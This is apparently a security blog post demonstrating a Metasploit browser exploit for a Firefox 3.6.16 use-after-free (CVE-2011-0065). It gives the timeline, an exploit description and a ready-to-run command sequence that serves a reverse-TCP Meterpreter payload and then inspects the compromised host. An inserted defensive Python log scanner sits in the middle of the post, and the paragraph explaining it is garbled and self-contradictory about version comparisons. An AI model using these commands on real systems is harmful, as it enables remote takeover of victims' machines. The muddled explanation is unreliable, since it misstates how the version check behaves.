CVE-2011-0065 : Mozilla Firefox mChannel use after free vulnerability Metasploit Demo
Timeline :
Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to the vendor on 2011-02-17
Coordinated public release of the vulnerability on 2011-04-28
Metasploit PoC provided on 2011-08-10
PoC provided by :
regenrecht
Rh0
Reference(s) :
CVE-2011-0065
OSVDB-72085
ZDI-11-158
MFSA-2011-13
Affected version(s) :
Firefox 3.6.17 and below
Firefox 3.5.19 and below
Seamonkey 2.0.14 and below
Tested on Windows XP SP3 with :
Mozilla Firefox 3.6.16
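A defender's first job with an advisory like this is finding which clients still run a build in the affected range. The script below, an added example that is not part of the original post, encodes the three "and below" branches listed above and checks Firefox/SeaMonkey User-Agent strings pulled from combined-format proxy log lines against them. The log lines, client IPs and non-affected version numbers it uses are constructed for the example; only the branch maxima (3.6.17, 3.5.19, 2.0.14) come from the advisory.

```python
import re

# Last vulnerable release per branch, taken from the "Affected version(s)" list
# (each is "and below"); any other branch is treated as not covered by this advisory.
LAST_VULNERABLE = {
    ("Firefox", (3, 6)): (3, 6, 17),
    ("Firefox", (3, 5)): (3, 5, 19),
    ("SeaMonkey", (2, 0)): (2, 0, 14),
}

PRODUCT_RE = re.compile(r"\b(Firefox|SeaMonkey)/(\d+(?:\.\d+)*)")
TRAILING_QUOTED_RE = re.compile(r'"([^"]*)"\s*$')


def parse_version(text):
    """'3.6.16' -> (3, 6, 16); missing components are padded with 0 to three parts."""
    parts = [int(p) for p in text.split(".")]
    return tuple((parts + [0, 0, 0])[:3])


def is_affected(product, version):
    """True when product/version sits on a branch in LAST_VULNERABLE and is at or
    below that branch's last vulnerable release; other branches return False."""
    last = LAST_VULNERABLE.get((product, version[:2]))
    return last is not None and version <= last


def classify_user_agent(ua):
    """Return (product, version_string, affected) for a Firefox/SeaMonkey UA, else None."""
    m = PRODUCT_RE.search(ua)
    if m is None:
        return None
    product, ver_text = m.group(1), m.group(2)
    return product, ver_text, is_affected(product, parse_version(ver_text))


def extract_user_agent(line):
    """Take the trailing quoted field of a combined-format log line; if there is
    none, treat the whole line as a bare User-Agent string."""
    m = TRAILING_QUOTED_RE.search(line)
    return m.group(1) if m else line.strip()


def scan_log(lines):
    """Return [(client, product, version)] for each line whose UA is an affected build.
    The client is the first whitespace-separated field of the line."""
    hits = []
    for line in lines:
        result = classify_user_agent(extract_user_agent(line))
        if result is None:
            continue
        product, ver_text, affected = result
        if affected:
            hits.append((line.split()[0], product, ver_text))
    return hits


# Constructed sample proxy log lines (combined log format); none are from the post.
# 3.6.18, 4.0.1 and 5.0 are simply versions above the listed maxima, not fix versions.
SAMPLE_LOG = [
    '192.168.178.50 - - [10/Aug/2011:12:00:01 +0200] "GET http://example.test/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16"',
    '192.168.178.51 - - [10/Aug/2011:12:00:02 +0200] "GET http://example.test/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18"',
    '192.168.178.52 - - [10/Aug/2011:12:00:03 +0200] "GET http://example.test/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"',
    '192.168.178.53 - - [10/Aug/2011:12:00:04 +0200] "GET http://example.test/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14"',
    '192.168.178.54 - - [10/Aug/2011:12:00:05 +0200] "GET http://example.test/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"',
    '192.168.178.55 - - [10/Aug/2011:12:00:06 +0200] "GET http://example.test/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1"',
]

if __name__ == "__main__":
    for client, product, ver in scan_log(SAMPLE_LOG):
        print(f"{client}: {product} {ver} is within the MFSA-2011-13 affected range")
```

The branch-keyed lookup matters: a plain "version <= 3.6.17" comparison would wrongly flag every 3.5.x build as affected only up to 3.5.19 by accident and miss nothing, but it would also wrongly clear 3.5.20 and wrongly flag nothing on 2.0.x, so each branch carries its own ceiling. User-Agent strings are client-controlled, so treat the output as an inventory lead to confirm against endpoint data rather than proof of patch state.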
Description :
This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT element's mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink interface. mChannel then becomes a dangling pointer and can be reused when the OBJECT's data attribute is set. (Discovered by regenrecht.) This module uses a heap spray with a minimal ROP chain to bypass DEP on Windows XP SP3.
Commands :
use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
getuid
sysinfo
ipconfig
I recommend you read these related posts:
- CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
- CVE-2011-3658 Firefox 7/8 nsSVGValue Vulnerability Metasploit Demo
- CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit
- CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo
- CVE-2006-3677 : Mozilla Suite/Firefox Navigator Object Code Execution
- CVE-2005-2265 : Mozilla Suite/Firefox InstallVersion compareTo() Code Execution
- Mozilla Firefox Bootstrapped Add-on Social Engineering Code Execution Metasploit Demo
- CVE-2011-3659 Firefox 8/9 AttributeChildRemoved() Use-After-Free Metasploit Demo
- Fraudulent TURKTRUST Digital Certificate Used In Active Attacks
- CVE-2010-3867 : ProFTPD IAC Remote Root Exploit